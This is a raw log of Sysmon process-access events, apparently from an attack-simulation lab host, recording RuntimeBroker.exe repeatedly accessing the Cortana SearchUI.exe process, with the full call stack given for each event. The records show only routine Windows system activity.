12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 